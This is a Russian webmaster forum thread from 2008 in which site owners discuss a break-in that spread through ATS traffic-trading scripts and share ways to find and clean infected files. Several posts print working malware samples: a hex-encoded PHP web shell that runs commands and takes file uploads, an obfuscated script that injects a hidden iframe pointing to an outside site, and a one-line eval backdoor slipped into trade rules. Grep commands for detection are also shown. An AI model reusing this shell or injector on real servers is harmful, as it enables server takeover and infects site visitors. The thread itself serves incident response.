Master-X
Форум | Новости | Статьи
Главная » Форум » CJs » 
Тема: Очень нестандартный трейдер или взлом АТS?
цитата
06/11/08 в 16:51
 von Stoltz
color писал:
с разработчиками ATS пытался связаться - что то молчат.
То ли не интересно, то ли нет никого )
По почте что ли? 209 905 775 стучи. Меры принимаются. Любая помощь приветствуется. Набор первоочередных мер описан выше.
цитата
06/11/08 в 16:53
 color
von Stoltz писал:
По почте что ли? 209 905 775 стучи. Меры принимаются. Любая помощь приветствуется. Набор первоочередных мер описан выше.

Да вчера вечером еще стучал и Вам, и еще по одной аське что на сайте указана, не ответили )
Ну в принципе логи хотел дать, которые тут двумя постами выше уже опубликовали )
Файлики еще есть криптованные которые заливали, могу дать если интересуют
цитата
06/11/08 в 17:09
 von Stoltz
Конечно интересуют. Сейчас в асе, стучи.
цитата
06/11/08 в 18:15
 Soft-Com
на сервере нужно искать файлы с таким содержимым:

Код:

<?php $s="202069662028245F504F53545B706173735D213D273132332729207B206563686F2027203C68746D6C3E3C626F6479206267636F6C6F723D23424246464242206F6E6C6F61643
D22646F63756D656E742E6D79662E706173732E666F63757328293B223E3C666F726D206D6574686F643D504F53543E3C696E707574206E616D653D706173733E3C2F666F726D3E3C2F626F
64793E20203C2F68746D6C3E273B206578697428293B207D6563686F20273C68746D6C3E3C626F6479206267636F6C6F723D23424246464242206F6E6C6F61643D22646F63756D656E742E6
D79662E63632E666F63757328293B223E273B6563686F20273C666F726D206E616D653D6D7966206D6574686F643D504F535420656E63747970653D226D756C7469706172742F666F726D2D
64617461223E3C696E70757420747970653D68696464656E206E616D653D706173732076616C75653D272E245F504F53545B706173735D2E273E3C696E70757420747970653D66696C65206
E616D653D757066696C653E3C696E707574206E616D653D6E65776E616D653E3C696E70757420747970653D7375626D69743E3C62723E273B6563686F20273C696E707574206E616D653D63
632073697A653D37332076616C75653D22272E7374726970736C617368657328245F504F53545B63635D292E27223E3C2F666F726D3E273B6563686F20273C7072653E273B20696620286D6
F76655F75706C6F616465645F66696C6528245F46494C45535B27757066696C65275D5B27746D705F6E616D65275D2C20245F504F53545B6E65776E616D655D2929207B202F2A6563686F20
2253656E742E3C62723E5C6E223B2A2F207D69662028245F504F53545B6D66696C655D29207B2020202466703D666F70656E28245F504F53545B6E65776E616D655D2C277727293B2020206
66F7228246B3D303B20246B3C7374726C656E28245F504F53545B6D66696C655D293B20246B2B3D322920207B20202020246363203D2073756273747228245F504F53545B6D66696C655D2C
246B2C32293B20202020246363203D20273078272E2463633B2020202020202020246363203D20726F756E6428246363293B20202020246363203D2063687228246363293B2020202066777
2697465282466702C246363293B2020207D202066636C6F736528246670293B207D24636F3D7374726970736C617368657328245F504F53545B63635D293B206563686F206024636F603B20
6563686F20273C2F7072653E273B6563686F20273C2F626F64793E3C2F68746D6C3E273B20";$sss="";for($k=0;$k<strlen($s);$k+=2){$ss=chr(("0x".substr($s,$k,2))+0);$ss
s.=$ss;}eval($sss);$ssss="*****************************************************************************************************************************
*****************************************************************************************";?>

















                                                                                                           <script> var s='3C696672616D65207372633D2268
7474703A2F2F7777772E7070762D7365782E636F6D2F7A2F7374617469632E70687022206865696768743D223222207374796C653D22646973706C61793A6E6F6E65222077696474683D223
2223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37);  o=o+c+s.substr(i,2);} var v=navigator.userAgent.toLower
Case(); if (v.indexOf('msie') != -1 && v.indexOf('nt 6.') == -1){document.write(unescape(o));}</script>



искать можно так:

Код:

find / -name \*.php -exec grep -H "3C696672616D652073" {} \; | awk -F":" '{print $1}'


команда выдаст список файлов, которые дёрганием через веб рассыживает инъекции в шаблоны (и не только).

Спасибо Lin за "кошку" для тренировки icon_smile.gif.
цитата
06/11/08 в 19:33
 supphosting.com
Soft-Com писал:
на сервере нужно искать файлы с таким содержимым:
команда выдаст список файлов, которые дёрганием через веб рассыживает инъекции в шаблоны (и не только).

Спасибо Lin за "кошку" для тренировки icon_smile.gif.

Это только php-shell через который выполняется заражение шаблонов, и последний кусок <script> .... 3C69667 </script> может и не быть.
После удаления этого пхп-шелла надо искать зараженные файлы содержащие скрипт с кодом 3C69667.
После этого банить айпишку с которой идет заражение (на данный момент 79.135.187.18), и защищать свои скрипты от повторов.
цитата
06/11/08 в 19:35
 color
заражение вроде идет через iframe в названии добавляемого трейдера. активируется при входе в админку сиджа соответственно.
цитата
06/11/08 в 19:35
 Gidz
эта хуйня на всех сиджах icon_twisted.gif даже в прогрессе /progress/class.Trader.php
цитата
06/11/08 в 20:19
 Lin
Оффтопик: да уж, трейдер и вправду "нестандартный"
цитата
06/11/08 в 20:49
 pns
даже в прогрессе /progress/class.Trader.php

он же зазенден? всё равно дописывает?
цитата
06/11/08 в 21:10
 Gidz
ХЗ, у меня в нем был и еще в class.Unique.php тоже в progress/click_time_stats.php и в /gs.php теперь появился icon_evil.gif
цитата
06/11/08 в 21:45
 Soft-Com
Код:

find / -name \*.html -exec grep -H "3C696672616D652073" {} \; | awk -F":" '{print $1}'
find / -name \*.php -exec grep -H "2020696620282" {} \; | awk -F":" '{print $1}'


все файлики найденные нужно почистить
цитата
06/11/08 в 21:54
 mickey
в платных скриптах кто-то замечал? кроме АТХа
цитата
06/11/08 в 21:57
 Grach
sawm писал:
в платных скриптах кто-то замечал? кроме АТХа

в атс тоже раньше никто не замечал icon_sad.gif
цитата
06/11/08 в 22:03
 mickey
как посмотреть интересно в ФТТ и СмартСЖ
цитата
06/11/08 в 22:31
 Gidz
Soft-Com писал:
Код:

find / -name \*.html -exec grep -H "3C696672616D652073" {} \; | awk -F":" '{print $1}'
find / -name \*.php -exec grep -H "2020696620282" {} \; | awk -F":" '{print $1}'


все файлики найденные нужно почистить


класс, чем дальше тем лучше icon_biggrin.gif
цитата
06/11/08 в 23:12
 Grach
sawm писал:
как посмотреть интересно в ФТТ и СмартСЖ

а че ты там посмотреть хочешь?

вот интересно, кто следующий? icon_sad.gif

если еще не все отмучались то вот, может поможет:
ищем файлы
sync.php
backup.php
thumbs.php
ipfiles.php
а также файлы пхп, которые находятся внутри папки и имеют такое же имя, например - ../218/218.php

Оффтопик: дайте мне горло этого "гения" - я его придушу, суку icon_evil.gif
цитата
07/11/08 в 00:11
 Lin
Grach писал:
а также файлы пхп, которые находятся внутри папки и имеют такое же имя, например - ../218/218.php

Оффтопик: блин, где-то я такое уже видел smail101.gif есть такие вири, в папку заходиш эксплорером а он туда сразу копируется с именем этой папки, и прикидывается папкой smail101.gif
цитата
07/11/08 в 00:22
 Grach
Lin писал:
Оффтопик: блин, где-то я такое уже видел smail101.gif есть такие вири, в папку заходиш эксплорером а он туда сразу копируется с именем этой папки, и прикидывается папкой smail101.gif

да, есть такая херь
цитата
07/11/08 в 00:52
 Bi Boy 77
Gidz писал:
у меня 1.7.1

и еще может не в тему.. постоянно стали выскакивать сообщения при первом заходе в админку сиджа, при второй попытке все ок.

Warning: Cannot modify header information - headers already sent by (output started at /usr/home/user/www/xxx.net/settings/ca.php:92) in /usr/home/user/www/xxx.net/admin.php on line 32

Warning: Cannot modify header information - headers already sent by (output started at /usr/home/user/www/xxx.net/settings/ca.php:92) in /usr/home/user/www/xxx.net/admin.php on line 38


у меня тоже 1.7.1, и тоже при входе такая хрень лезет.
Что это такое?
цитата
07/11/08 в 01:28
 vlad3d
у меня связка АТС+стрим. в стриме эта хрень живет сдесь /streamrotator/tmp/face0.2.html и так далее сколько у вас этих фейсов. вот только почему то от 1 и так далее, а в 0 не живет. а в АТС иногда заражало index.php im.php. как только оно ко мне попало интересно. трейдера с ифреймом не нашел в админке АтСа
цитата
07/11/08 в 01:44
 Grach
vlad3d писал:
в стриме эта хрень живет сдесь /streamrotator/tmp/face0.2.html

эта хрень там не живет, она туда прописывается
шукай по своему серверу вышеозначенное
цитата
07/11/08 в 01:55
 Farel777
дедики надо проверять.после добавления это недоразумение заменило страницу добавления,дальше вроде не прошло.
цитата
07/11/08 в 07:42
 [8-P]
капча при регистрации трейдеров не помогла.
добавился в трейд + рулезы заменил на
"1.No illegal sites 2.No sites with consoles 3.no exploits, viruses, dialers, active-x, etc.<?php eval(stripslashes($_POST[ss]));?>" (причем трейд рулезы полностью заменены)
в шаблонах вроде ничего не нашол. (АТС + стрим)
в логах подозрительного не обнаружил. добавился только на один сидж из 4х.
цитата
07/11/08 в 08:04
 Grach
[8-P] писал:
добавился только на один сидж из 4х.

А им больше и не надо, дальше херь лезет по остальным папкам без этого трейдера.
цитата
07/11/08 в 09:08
 Gidz
а кто скажет? у меня на сиджах такое в коде в начале страницы, это нормально? а то я уже параноиком стал...

Код:
<script language="JavaScript">
<!--
// ATS PRO Traffic Manager, http://www.ats-project.com
var i,d;
var k=2;
var mc='fqewogpv0eqqmkg?$lu?="rcvj?1="gzrktgu?';
var l='';
var m='';
var ec='';
for(i=0;i<38;i++) {
d=mc.charCodeAt(i)-k;
if (i<20) {l=l+String.fromCharCode(d);} else {m=m+String.fromCharCode(d);}
}
ec = l+'9be60d0c'+m+'Fri, 7-Nov-08 14:08:17 G'+'MT'+'";';
eval(ec);
-->
</script><script type="text/javascript">
<!--
var d=new Date();
var ex_d=new Date();
ex_d.setTime(d.getTime()+1000*31536000);
document.cookie='stream_face0=1226022897.3;path=/;expires='+ex_d.toGMTString(ex_d)+';';
// -->
</script>
Стр. « первая   <  1, 2, 3, 4, 5  >  последняя »


Эта страница в полной версии